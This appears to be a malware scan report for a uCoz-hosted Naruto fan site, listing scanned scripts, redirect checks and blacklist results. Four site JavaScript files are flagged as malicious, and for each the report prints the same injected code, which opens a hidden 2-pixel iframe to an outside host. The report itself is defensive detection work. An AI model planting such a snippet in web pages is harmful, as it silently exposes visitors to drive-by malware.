Scanned pages/files
Request | Server response | Status |
http://naruto-space.ucoz.ru/index/0-2 | 200 OK Content-Length: 51156 Content-Type: text/html | clean |
http://webo4ka.3dn.ru/Ucoz/procent_zagruski.js | 200 OK Content-Length: 460 Content-Type: text/javascript | clean |
http://s43.ucoz.net/src/jquery-1.6.1.js | 200 OK Content-Length: 101532 Content-Type: text/javascript | clean |
http://s43.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s43.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://naruto-space.ucoz.ru/glossy.js | 200 OK Content-Length: 16793 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var a = document.createElement('iframe'); a.src = 'http://www.real.dp.ua/img/upload/item/207/stats.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})(); Antivirus reports:
| ||
http://naruto-space.ucoz.ru/js/Slider.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://naruto-space.ucoz.ru/ | 200 OK Content-Length: 72221 Content-Type: text/html | clean |
http://naruto-space.ucoz.ru/js/content.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://naruto-space.ucoz.ru/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://webo4ka.3dn.ru/Ucoz/Webo4ka-oblako_tegov.js | 200 OK Content-Length: 6887 Content-Type: text/javascript | clean |
http://naruto-space.ucoz.ru/Narutospace.js | 200 OK Content-Length: 44350 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var a = document.createElement('iframe'); a.src = 'http://www.real.dp.ua/img/upload/item/207/stats.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})(); Antivirus reports:
| ||
http://naruto-space.ucoz.ru/js/jquery.easing.js | 200 OK Content-Length: 8770 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var a = document.createElement('iframe'); a.src = 'http://www.real.dp.ua/img/upload/item/207/stats.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})(); Antivirus reports:
| ||
http://naruto-space.ucoz.ru/js/jquery.sweet-menu-1.0.js | 200 OK Content-Length: 4655 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var a = document.createElement('iframe'); a.src = 'http://www.real.dp.ua/img/upload/item/207/stats.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})(); Antivirus reports:
| ||
http://counter.rambler.ru/top100.jcn?2546737 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: naruto-space.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 28 Jul 2015 09:05:30 GMT
Server: uServ/3.2.2
Content-Length: 72221
Content-Type: text/html; charset=UTF-8
...72221 bytes of data.
GET / HTTP/1.1
Host: naruto-space.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 28 Jul 2015 09:05:30 GMT
Server: uServ/3.2.2
Content-Length: 72221
Content-Type: text/html; charset=UTF-8
...72221 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: naruto-space.ucoz.ru
Referer: http://www.google.com/search?q=naruto-space.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: naruto-space.ucoz.ru
Referer: http://www.google.com/search?q=naruto-space.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=naruto-space.ucoz.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://naruto-space.ucoz.ru/
Result: naruto-space.ucoz.ru is not infected or malware details are not published yet.
Result: naruto-space.ucoz.ru is not infected or malware details are not published yet.